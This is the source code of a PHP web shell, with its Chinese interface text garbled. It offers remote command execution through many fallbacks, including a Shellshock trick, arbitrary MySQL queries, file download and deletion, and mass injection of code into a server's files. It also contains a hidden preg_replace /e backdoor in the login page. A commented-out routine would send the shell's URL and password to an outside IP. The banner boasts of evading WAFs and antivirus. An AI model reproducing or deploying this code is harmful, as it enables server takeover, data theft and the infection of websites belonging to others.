END; if ($fbaction == 'fbquery') { $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg()); $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg()); echo '' . "\n\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '\n"; } echo "\n"; ibase_field_info($fbresult, 0); while ($fbrow = ibase_fetch_row($fbresult)) { echo "\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo ''; } echo "\n"; } echo "
' . ibase_field_info($fbresult, $i) . "
' . "{$fbrow[$i]}" . '
"; ibase_free_result($fbresult); ibase_close(); } } //} break; case "zippak": //function zipact() //{ $zfile = $_POST['zfile'] ? $_POST['zfile'] : 'php.zip'; $jypt = $_POST['jypt'] ? $_POST['jypt'] : './'; $tip = "δ��ʼ��ѹ"; if ($_POST['zip'] == 'zip') { if (function_exists(zip_open)) { $zfile = key_exists('zip', $_GET) && $_GET['zip'] ? $_GET['zip'] : $zfile; $zfile = str_replace(array(dirname(__FILE__) . "/", dirname(__FILE__) . "\\"), array("", ""), $zfile); $zpath = str_replace('\\', '/', dirname(__FILE__)) . '/' . $zfile; if (!is_file($zpath)) { $tip = '�ļ�"' . $zpath . '"������!'; } else { $zip = new ZipArchive(); $rs = $zip->open($zpath); if ($rs !== TRUE) { $tip = '��ѹʧ��:' . $rs; } $zip->extractTo($jypt); $zip->close(); $tip = $zfile . '��ѹ�ɹ�!'; } } else { $tip = "��������֧��PHP_ZIP���,��ȷ��"; } } print <<
��ģ��ʹ��PHP��zip_open��չ������ZIPѹ���ļ�
ʹ��ǰ���ڡ�ϵͳ��Ϣ����ȷ��ϵͳ֧��php_zip
ѹ���ļ�·����д�¼�Ŀ¼������·�������Ŀ¼�Ƿ�ɲ���δ���� :-(
ȷ��Ŀ��·����д

ѹ���ļ�·����


Ŀ��·����




{$tip}


END; //} break; case "mysql_msg": $conn = @mysql_connect($_COOKIE['m_eanverhost'] . ':' . $_COOKIE['m_eanverport'], $_COOKIE['m_eanveruser'], $_COOKIE['m_eanverpass']); if ($conn) { print << function Delok(msg,gourl) { \tsmsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?"; \tif(confirm(smsg)){window.location = gourl;} } function Createok(ac) { \tif(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);'; \tif(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;'; \tif(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;'; \treturn false; } END; $BOOL = false; $MSG_BOX = '�û�:' . $_COOKIE['m_eanveruser'] . '      ��ַ:' . $_COOKIE['m_eanverhost'] . ':' . $_COOKIE['m_eanverport'] . '      �汾:'; $k = 0; $result = @mysql_query('select version();', $conn); while ($row = @mysql_fetch_array($result)) { $MSG_BOX .= $row[$k]; $k++; } echo '
���ݿ�:'; $result = mysql_query("SHOW DATABASES", $conn); while ($db = mysql_fetch_array($result)) { echo '  [' . $db['Database'] . ']'; } echo '
'; if (isset($_GET['db'])) { mysql_select_db($_GET['db'], $conn); if (!empty($_POST['nsql'])) { $BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'], $conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� ' . mysql_error(); } if (is_array($_POST['insql'])) { $query = 'INSERT INTO ' . $_GET['table'] . ' ('; foreach ($_POST['insql'] as $var => $key) { $querya .= $var . ','; $queryb .= '\'' . addslashes($key) . '\','; } $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');'; $MSG_BOX = mysql_query($query, $conn) ? '���ӳɹ�' : '����ʧ�� ' . mysql_error(); } if (is_array($_POST['upsql'])) { $query = 'UPDATE ' . $_GET['table'] . ' SET '; foreach ($_POST['upsql'] as $var => $key) { $queryb .= $var . '=\'' . addslashes($key) . '\','; } $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';'; $MSG_BOX = mysql_query($query, $conn) ? '�޸ijɹ�' : '�޸�ʧ�� ' . mysql_error(); } if (isset($_GET['del'])) { $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn); $good = mysql_fetch_assoc($result); $query = 'DELETE FROM ' . $_GET['table'] . ' WHERE '; foreach ($good as $var => $key) { $queryc .= $var . '=\'' . addslashes($key) . '\' AND '; } $where = $query . substr($queryc, 0, -4) . ';'; $MSG_BOX = mysql_query($where, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error(); } $action = '?eanver=mysql_msg&db=' . $_GET['db']; if (isset($_GET['drop'])) { $query = 'Drop TABLE IF EXISTS ' . $_GET['drop'] . ';'; $MSG_BOX = mysql_query($query, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error(); } if (isset($_GET['table'])) { $action .= '&table=' . $_GET['table']; if (isset($_GET['edit'])) { $action .= '&edit=' . $_GET['edit']; } } if (isset($_GET['insert'])) { $action .= '&insert=' . $_GET['insert']; } echo '
'; echo ' '; echo ' '; echo ' '; echo ' '; echo '
'; echo '
' . $MSG_BOX . '
' . $_GET['db'] . ' ---> '; if (isset($_GET['table'])) { echo '' . $_GET['table'] . ' '; echo '[����]
'; if (isset($_GET['edit'])) { if (isset($_GET['p'])) { $atable = $_GET['table'] . '&p=' . $_GET['p']; } else { $atable = $_GET['table']; } echo '
'; $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn); $good = mysql_fetch_assoc($result); $u = 0; foreach ($good as $var => $key) { $queryc .= $var . '=\'' . $key . '\' AND '; $type = @mysql_field_type($result, $u); $len = @mysql_field_len($result, $u); echo '
' . $var . ' ' . $type . '(' . $len . ')
'; $u++; } $where = 'WHERE ' . substr($queryc, 0, -4); echo ''; echo '
'; } else { $query = 'SHOW COLUMNS FROM ' . $_GET['table']; $result = mysql_query($query, $conn); $fields = array(); $pagesize = 20; $row_num = mysql_num_rows(mysql_query('SELECT * FROM ' . $_GET['table'], $conn)); $numrows = $row_num; $pages = intval($numrows / $pagesize); if ($numrows % $pagesize) { $pages++; } $offset = $pagesize * ($page - 1); $page = $_GET['p']; if (!$page) { $page = 1; } if (!isset($_GET['p'])) { $p = 0; $_GET['p'] = 1; } else { $p = ((int) $_GET['p'] - 1) * 20; } echo ''; echo ''; while ($row = @mysql_fetch_assoc($result)) { array_push($fields, $row['Field']); echo ''; } echo ''; if (eregi('WHERE|LIMIT', $_POST['nsql']) && eregi('SELECT|FROM', $_POST['nsql'])) { $query = $_POST['nsql']; } else { $query = 'SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $p . ', 20;'; } $result = mysql_query($query, $conn); $v = $p; while ($text = @mysql_fetch_assoc($result)) { echo ''; foreach ($fields as $row) { echo ''; } echo '' . "\r\n"; $v++; } echo '
����' . $row['Field'] . '
�޸� '; echo ' ɾ�� ' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . '
'; $pagep = $page - 1; $pagen = $page + 1; echo "���� " . $row_num . " ����¼ "; if ($pagep > 0) { $pagenav .= " ��ҳ ��һҳ "; } else { $pagenav .= " ��һҳ "; } if ($pagen <= $pages) { $pagenav .= " ��һҳ βҳ"; } else { $pagenav .= " ��һҳ "; } $pagenav .= " �� [" . $page . "/" . $pages . "] ҳ ����ҳ"; echo $pagenav; echo '
'; } } elseif (isset($_GET['insert'])) { echo '' . $_GET['insert'] . ''; $result = mysql_query('SELECT * FROM ' . $_GET['insert'], $conn); $fieldnum = @mysql_num_fields($result); echo '
'; for ($i = 0; $i < $fieldnum; $i++) { $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); echo '
' . $name . ' ' . $type . '(' . $len . ')
'; } echo '
'; } else { $query = 'SHOW TABLE STATUS'; $status = @mysql_query($query, $conn); while ($statu = @mysql_fetch_array($status)) { $statusize[] = $statu['Data_length']; $statucoll[] = $statu['Collation']; } $query = 'SHOW TABLES FROM ' . $_GET['db'] . ';'; echo ''; echo ''; echo ''; echo ''; echo ''; $result = @mysql_query($query, $conn); $k = 0; while ($table = mysql_fetch_row($result)) { $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_')); echo ''; echo ''; echo '' . "\r\n"; $k++; } echo '
���� ���� �ַ��� ��С
' . $table[0] . ' ���� ɾ�� ' . $statucoll[$k] . '' . File_Size($statusize[$k]) . '
'; } } } else { die('����MYSQLʧ��,�����µ�½.'); } if (!$BOOL and addslashes($query) != '') { echo ''; } break; default: html_main($path, $shellname); break; } css_foot(); /*---doing---*/ function do_write($file, $t, $text) { $key = true; $handle = @fopen($file, $t); if (!@fwrite($handle, $text)) { @chmod($file, 0666); $key = @fwrite($handle, $text) ? true : false; } @fclose($handle); return $key; } function do_show($filepath) { $show = array(); $dir = dir($filepath); while ($file = $dir->read()) { if ($file == '.' or $file == '..') { continue; } $files = str_path($filepath . '/' . $file); $show[] = $files; } $dir->close(); return $show; } function do_deltree($deldir) { $showfile = do_show($deldir); foreach ($showfile as $del) { if (is_dir($del)) { if (!do_deltree($del)) { return false; } } elseif (!is_dir($del)) { @chmod($del, 0777); if (!@unlink($del)) { return false; } } } @chmod($deldir, 0777); if (!@rmdir($deldir)) { return false; } return true; } function do_showsql($query, $conn) { $result = @mysql_query($query, $conn); html_n('

'); } function hmlogin($xiao = 1) { $serveru = $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; $serverp = envlpass; if (strpos($serveru, "0.0") > 0 or strpos($serveru, "192.168.") > 0 or strpos($serveru, "localhost") > 0 or $serveru == $_COOKIE['serveru'] and $serverp == $_COOKIE['serverp']) { echo ""; } else { setcookie('serveru', $serveru); setcookie('serverp', $serverp); if ($xiao == 1) { echo ""; } else { geturl(); } } } function do_down($fd) { if (!@file_exists($fd)) { msg('�����ļ�������'); } $fileinfo = pathinfo($fd); header('Content-type: application/x-' . $fileinfo['extension']); header('Content-Disposition: attachment; filename=' . $fileinfo['basename']); header('Content-Length: ' . filesize($fd)); @readfile($fd); exit; } function do_download($filecode, $file) { header("Content-type: application/unknown"); header('Accept-Ranges: bytes'); header("Content-length: " . strlen($filecode)); header("Content-disposition: attachment; filename=" . $file . ";"); echo $filecode; exit; } function TestUtf8($text) { if (strlen($text) < 3) { return false; } $lastch = 0; $begin = 0; $BOM = true; $BOMchs = array(0xef, 0xbb, 0xbf); $good = 0; $bad = 0; $notAscii = 0; for ($i = 0; $i < strlen($text); $i++) { $ch = ord($text[$i]); if ($begin < 3) { $BOM = $BOMchs[$begin] == $ch; $begin += 1; continue; } if ($begin == 4 && $BOM) { break; } if ($ch >= 0x80) { $notAscii++; } if (($ch & 0xc0) == 0x80) { if (($lastch & 0xc0) == 0xc0) { $good += 1; } else { if (($lastch & 0x80) == 0) { $bad += 1; } } } else { if (($lastch & 0xc0) == 0xc0) { $bad += 1; } } $lastch = $ch; } if ($begin == 4 && $BOM) { return 2; } else { if ($notAscii == 0) { return 1; } else { if ($good >= $bad) { return 2; } else { return 0; } } } } function File_Str($string) { return str_replace('//', '/', str_replace('\\', '/', $string)); } function File_Write($filename, $filecode, $filemode) { $key = true; $handle = @fopen($filename, $filemode); if (!@fwrite($handle, $filecode)) { @chmod($filename, 0666); $key = @fwrite($handle, $filecode) ? true : false; } @fclose($handle); return $key; } function Exec_Run($cmd) { $res = ''; if (function_exists('exec')) { @exec($cmd, $res); $res = join("\n", $res); } elseif (function_exists('shell_exec')) { $res = @shell_exec($cmd); } elseif (function_exists('system')) { @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists('passthru')) { @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cmd, 'r'))) { $res = ''; while (!@feof($f)) { $res .= @fread($f, 1024); } @pclose($f); } elseif (substr(dirname($_SERVER["SCRIPT_FILENAME"]), 0, 1) != "/" && class_exists('COM')) { $w = new COM('WScript.shell'); $e = $w->exec($cmd); $f = $e->StdOut(); $res = $f->ReadAll(); } elseif (function_exists('proc_open')) { $length = strcspn($cmd, " \t"); $token = substr($cmd, 0, $length); if (isset($aliases[$token])) { $cmd = $aliases[$token] . substr($cmd, $length); } $p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!feof($io[1])) { $res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) { $res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } elseif (function_exists('mail')) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".", "data"); putenv("PHP_LOL=() { x; }; {$cmd} >{$tmp} 2>&1"); mail("a@127.0.0.1", "", "", "", "-bv"); } else { $res = "Not vuln (not bash)"; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { $res = $output; } else { $res = "No output, or not vuln."; } } return $res; } //if (isset($_GET['login']) == 'geturl') { //@set_time_limit(10); // $serveru = $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; //$serverp = envlpass; // $copyurl = base64_decode("aHR0cCUzQS8vMTA2LjUyLjEwNy4xODAvdXNhLnBocCUzRmtkYSUzRA=="); // $url = $copyurl . $serveru . '&cmd=' . $serverp; // $url = urldecode($url); //GetHtml($url); //} function File_Mode() { $RealPath = realpath('./'); $SelfPath = $_SERVER['PHP_SELF']; $SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/')); return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); } function File_Size($size) { $kb = 1024; // Kilobyte $mb = 1024 * $kb; // Megabyte $gb = 1024 * $mb; // Gigabyte $tb = 1024 * $gb; // Terabyte if ($size < $kb) { return $size . " B"; } else { if ($size < $mb) { return round($size / $kb, 2) . " K"; } else { if ($size < $gb) { return round($size / $mb, 2) . " M"; } else { if ($size < $tb) { return round($size / $gb, 2) . " G"; } else { return round($size / $tb, 2) . " T"; } } } } } function File_Read($filename) { $handle = @fopen($filename, "rb"); $filecode = @fread($handle, @filesize($filename)); @fclose($handle); return $filecode; } function do_phpfun($cmd, $fun) { $res = ''; switch ($fun) { case "exec": @exec($cmd, $res); $res = join("\n", $res); break; case "shell_exec": $res = @shell_exec($cmd); break; case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean(); break; case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean(); break; case "popen": if (@is_resource($f = @popen($cmd, "r"))) { while (!@feof($f)) { $res .= @fread($f, 1024); } } @pclose($f); break; } return $res; } function do_passreturn($dir, $code, $type, $bool, $filetype = '', $shell = my_shell) { $show = do_show($dir); foreach ($show as $files) { if (is_dir($files) && $bool) { do_passreturn($files, $code, $type, $bool, $filetype, $shell); } else { if ($files == $shell) { continue; } switch ($type) { case "guama": if (debug($files, $filetype)) { do_write($files, "ab", "\n" . $code) ? html_n("�ɹ�--> {$files}
") : html_n("ʧ��--> {$files}
"); } break; case "qingma": $filecode = @file_get_contents($files); if (stristr($filecode, $code)) { $newcode = str_replace($code, '', $filecode); do_write($files, "wb", $newcode) ? html_n("�ɹ�--> {$files}
") : html_n("ʧ��--> {$files}
"); } break; case "tihuan": $filecode = @file_get_contents($files); if (stristr($filecode, $code)) { $newcode = str_replace($code, $filetype, $filecode); do_write($files, "wb", $newcode) ? html_n("�ɹ�--> {$files}
") : html_n("ʧ��--> {$files}
"); } break; case "scanfile": $file = explode('/', $files); if (stristr($file[count($file) - 1], $code)) { html_a("?eanver=editr&p={$files}", $files); echo '
'; } break; case "scancode": $filecode = @file_get_contents($files); if (stristr($filecode, $code)) { html_a("?eanver=editr&p={$files}", $files); echo '
'; } break; case "scanphp": $fileinfo = pathinfo($files); if ($fileinfo['extension'] == $code) { $filecode = @file_get_contents($files); if (muma($filecode, $code)) { html_a("?eanver=editr&p=" . urlencode($files), "�༭"); html_a("?eanver=del&p=" . urlencode($files), "ɾ��"); echo $files . '
'; } } break; } } } } class PHPzip { var $file_count = 0; var $datastr_len = 0; var $dirstr_len = 0; var $filedata = ''; var $gzfilename; var $fp; var $dirstr = ''; function unix2DosTime($unixtime = 0) { $timearray = $unixtime == 0 ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return $timearray['year'] - 1980 << 25 | $timearray['mon'] << 21 | $timearray['mday'] << 16 | $timearray['hours'] << 11 | $timearray['minutes'] << 5 | $timearray['seconds'] >> 1; } function startfile($path = '2238888889.zip') { $this->gzfilename = $path; $mypathdir = array(); do { $mypathdir[] = $path = dirname($path); } while ($path != '.'); @end($mypathdir); do { $path = @current($mypathdir); @mkdir($path); } while (@prev($mypathdir)); if ($this->fp = @fopen($this->gzfilename, "w")) { return true; } return false; } function addfile($data, $name) { $name = str_replace('\\', '/', $name); if (strrchr($name, '/') == '/') { return $this->adddir($name); } $dtime = dechex($this->unix2DosTime()); $hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x' . $dtime[2] . $dtime[3] . '\\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $datastr = "PK\3\4"; $datastr .= "\24\0"; $datastr .= "\0\0"; $datastr .= "\10\0"; $datastr .= $hexdtime; $datastr .= pack('V', $crc); $datastr .= pack('V', $c_len); $datastr .= pack('V', $unc_len); $datastr .= pack('v', strlen($name)); $datastr .= pack('v', 0); $datastr .= $name; $datastr .= $zdata; $datastr .= pack('V', $crc); $datastr .= pack('V', $c_len); $datastr .= pack('V', $unc_len); fwrite($this->fp, $datastr); $my_datastr_len = strlen($datastr); unset($datastr); $dirstr = "PK\1\2"; $dirstr .= "\0\0"; $dirstr .= "\24\0"; $dirstr .= "\0\0"; $dirstr .= "\10\0"; $dirstr .= $hexdtime; $dirstr .= pack('V', $crc); $dirstr .= pack('V', $c_len); $dirstr .= pack('V', $unc_len); // uncompressed filesize $dirstr .= pack('v', strlen($name)); // length of filename $dirstr .= pack('v', 0); // extra field length $dirstr .= pack('v', 0); // file comment length $dirstr .= pack('v', 0); // disk number start $dirstr .= pack('v', 0); // internal file attributes $dirstr .= pack('V', 32); // external file attributes - 'archive' bit set $dirstr .= pack('V', $this->datastr_len); // relative offset of local header $dirstr .= $name; $this->dirstr .= $dirstr; //Ŀ¼��Ϣ $this->file_count++; $this->dirstr_len += strlen($dirstr); $this->datastr_len += $my_datastr_len; } function adddir($name) { $name = str_replace("\\", "/", $name); $datastr = "PK\3\4\n\0\0\0\0\0\0\0\0\0"; $datastr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name)); $datastr .= pack("v", 0) . $name . pack("V", 0) . pack("V", 0) . pack("V", 0); fwrite($this->fp, $datastr); $my_datastr_len = strlen($datastr); unset($datastr); $dirstr = "PK\1\2\0\0\n\0\0\0\0\0\0\0\0\0"; $dirstr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name)); $dirstr .= pack("v", 0) . pack("v", 0) . pack("v", 0) . pack("v", 0); $dirstr .= pack("V", 16) . pack("V", $this->datastr_len) . $name; $this->dirstr .= $dirstr; $this->file_count++; $this->dirstr_len += strlen($dirstr); $this->datastr_len += $my_datastr_len; } function createfile() { $endstr = "PK\5\6\0\0\0\0" . pack('v', $this->file_count) . pack('v', $this->file_count) . pack('V', $this->dirstr_len) . pack('V', $this->datastr_len) . "\0\0"; fwrite($this->fp, $this->dirstr . $endstr); fclose($this->fp); } } function start_unzip($tmp_name, $new_name, $todir = 'zipfile') { $zip = new ZipArchive(); if ($zip->open($tmp_name) !== TRUE) { echo '��Ǹ��ѹ�����޷��򿪻���'; } $zip->extractTo($todir); $zip->close(); echo '��ѹ��ϣ�   �����ѹĿ¼   ����'; } function muma($filecode, $filetype) { $dim = array("php" => array("eval(", "exec("), "asp" => array("WScript.Shell", "execute(", "createtextfile("), "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"), "jsp" => array("runtime.exec(")); foreach ($dim[$filetype] as $code) { if (stristr($filecode, $code)) { return true; } } } function debug($file, $ftype) { $type = explode('|', $ftype); foreach ($type as $i) { if (stristr($file, $i)) { return true; } } } /*---string---*/ function str_path($path) { return str_replace('//', '/', $path); } function msg($msg) { die(""); } function uppath($nowpath) { $nowpath = str_replace('\\', '/', dirname($nowpath)); return urlencode($nowpath); } function xxstr($key) { $temp = str_replace("\\\\", "\\", $key); $temp = str_replace("\\", "\\\\", $temp); return $temp; } /*---html---*/ function html_ta($url, $name) { html_n("{$name}"); } function html_a($url, $name, $where = '') { html_n("{$name} "); } function html_img($url) { html_n(""); } function back() { html_n(""); } function html_radio($namei, $namet, $v1, $v2) { html_n('' . $namei); html_n('' . $namet . '

'); } function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false) { if ($mode) { html_n("{$text}"); } else { html_n("{$text} "); } } function html_base() { html_n('function base64encode(str){ var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; var out, i, len; var c1, c2, c3; len = str.length; i = 0; out = ""; while (i < len) { c1 = str.charCodeAt(i++) & 0xff; if (i == len) { out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt((c1 & 0x3) << 4); out += "=="; break; } c2 = str.charCodeAt(i++); if (i == len) { out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); out += base64EncodeChars.charAt((c2 & 0xF) << 2); out += "="; break; } c3 = str.charCodeAt(i++); out += base64EncodeChars.charAt(c1 >> 2); out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6)); out += base64EncodeChars.charAt(c3 & 0x3F); } return out; }'); } function html_text($name, $cols, $rows, $value = '') { html_n("

"); } function html_select($array, $mode = '', $change = '', $name = 'class') { html_n(""); } function html_font($color, $size, $name) { html_n("{$name}"); } function html_main($path, $shellname) { if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = TRUE; $hsafemode = "On (�ѿ�����ȫģʽ)"; } else { $safemode = FALSE; $hsafemode = "Off (δ������ȫģʽ)"; } $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]); $Server_OS = PHP_OS; $Server_Soft = $_SERVER["SERVER_SOFTWARE"]; $web_server = php_uname(); print <<�κη����������ﶼ������ �����޵���ɱ����->{$Server_OS}
��ַ: 
php��ȫģʽ:{$hsafemode}-----ip:{$Server_IP}-----php:�汾{$Server_Soft}-----ϵͳ�汾:{$web_server}
END; html_n("
"); } function islogin($shellname, $myurl) { $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]); $Server_OS = PHP_OS; $Server_Soft = $_SERVER["SERVER_SOFTWARE"]; $web_server = php_uname(); print << �κη����������ﶼ������! �����޵���ɱ����




Your Password:


������:{$Server_OS}
php�汾:{$Server_Soft}
�������汾:{$web_server}


[+] �������ڷǷ���;,�������Ը��������޵���ɱ����
[+] ֧��Mof˫�齨��Ȩ,Windows2003��������ͨ��
[+] ���κ�Waf-D�ܡ���������ȫ���������񡢰����ơ�360������ʿ��360��վ��ʿ
END; @preg_replace("/[_]/e", $_REQUEST['h'], "__"); } function html_sql() { html_input("text", "sqlhost", "localhost", "
MYSQL��ַ", "30"); html_input("text", "sqlport", "3306", "
MYSQL�˿�", "30"); html_input("text", "sqluser", "root", "
MYSQL�û�", "30"); html_input("password", "sqlpass", "", "
MYSQL����", "30"); html_input("text", "sqldb", "dbname", "
MYSQL����", "30"); html_input("submit", "sqllogin", "��½", "
"); html_n(''); } function Mysql_Len($data, $len) { if (strlen($data) < $len) { return $data; } return substr_replace($data, '...', $len); } function html_n($data) { echo "{$data}\n"; } /*---css---*/ function css_img($img) { $images = array("exe" => "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" . "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" . "xhIAOw==", "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" . "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" . "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "txt" => "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" . "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" . "UpPWG3Ig6Hq/XmRjuZwkAAA7", "html" => "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" . "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" . "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" . "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" . "ADs=", "js" => "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" . "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" . "a00AjYYBbc/o9HjNniUAADs=", "xml" => "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" . "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" . "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" . "IQA7", "mp3" => "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" . "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" . "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", "img" => "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" . "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" . "FxEAOw==", "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" . "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" . "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7", "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . 